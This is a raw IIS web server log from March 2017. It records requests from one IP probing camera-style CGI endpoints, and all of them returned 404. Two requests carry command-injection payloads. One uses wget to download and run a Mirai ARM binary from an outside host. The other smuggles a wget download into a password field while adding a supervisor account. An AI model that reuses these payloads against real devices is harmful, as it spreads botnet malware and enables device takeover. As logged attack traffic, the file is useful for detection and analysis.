#Software: Microsoft Internet Information Services 8.5
#Version: 1.0
#Date: 2017-03-28 01:50:20
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2017-03-28 01:50:20 172.16.53.98 POST /cgi-bin/supervisor/CloudSetup.cgi exefile=wget%20-O%20/tmp/Arm1%20http://51.15.128.114/bins/mirai.arm;chmod%200777%20/tmp/Arm1;/tmp/Arm1 85 - 109.201.134.2 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 72
#Software: Microsoft Internet Information Services 8.5
#Version: 1.0
#Date: 2017-03-28 05:07:12
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2017-03-28 05:07:12 172.16.53.98 GET /cgi-bin/user/Config.cgi .cab&action=get&category=Account.* 85 - 109.201.134.2 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 512
2017-03-28 05:07:12 172.16.53.98 GET /cgi-bin/supervisor/PwdGrp.cgi action=add&user=keks&pwd=;wget%20-O%20/tmp/Arm7%20http://185.148.38.2:8181/6%20-t%201;&grp=SUPERVISOR&lifetime=5%20MIN 85 - 109.201.134.2 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 16